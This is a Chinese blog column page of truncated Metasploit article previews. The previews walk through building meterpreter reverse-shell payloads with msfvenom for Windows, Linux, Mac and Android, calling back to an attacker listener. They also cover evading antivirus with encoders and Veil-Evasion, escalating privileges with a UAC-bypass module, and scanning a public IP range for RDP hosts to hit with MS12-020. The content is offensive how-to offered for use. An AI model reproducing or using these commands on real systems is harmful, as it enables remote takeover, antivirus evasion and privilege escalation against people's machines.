Metasploit
a439017985
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
ms16_032系统提权
1.利用msfvenom生成木马msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b '\x00\xfff\x0a' lhost=10.10.10.128 --platform windows lport=443 -f exe >/root/test.exe2.在msf下开启监听use ex原创 2017-02-24 08:30:40 · 1589 阅读 · 0 评论 -
msfvenom反弹
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac msfven原创 2017-02-24 08:32:36 · 965 阅读 · 0 评论 -
msf生成安卓渗透
利用msf来hack android1.msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -o test.apk2.签名(可以不用)1.keytool -genkey -v -keystore my-release-key.keystore -alias pentest -keyalg R原创 2017-02-24 08:33:54 · 4451 阅读 · 1 评论 -
veil-evasion 在xp下的三分之二免杀
1.apt-get install veil-evasion 2.List --查找相应的木马生成模块3.选择354.Options --查看需要设置的选项5.Set use_pyherion Y6.Generate7.选择1.msfvenom(defualt)8.设置本机ip10.10.10.128,端口44449.重命名木马xx.rc10.选择1pyins原创 2017-02-24 08:36:10 · 622 阅读 · 0 评论 -
bypass UAC 提权
在meterpreter下getuidsysinfo 查看系统版本及相关信息(多少位)backgroundsearch bypassuac use exploit/windows/local/bypassuac_eventvwr 此exploit对win10 64位有效injection的对win10 32位的有效,对64位的无效set session ex原创 2017-02-24 08:37:09 · 1993 阅读 · 0 评论 -
MS12-020远程桌面协议RDP拒绝访问漏洞
漏洞名称:MS12-020远程桌面协议RDP拒绝访问漏洞 条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。 1.nmap扫描某网段内开放3389端口的主机nmap -vv --open -p 3389 -Pn 60.10.0.0/16这一过程可以用其他扫描器如msscan代替>2.利用nmap中的ms12-020脚本批原创 2017-02-24 08:42:15 · 3368 阅读 · 0 评论
分享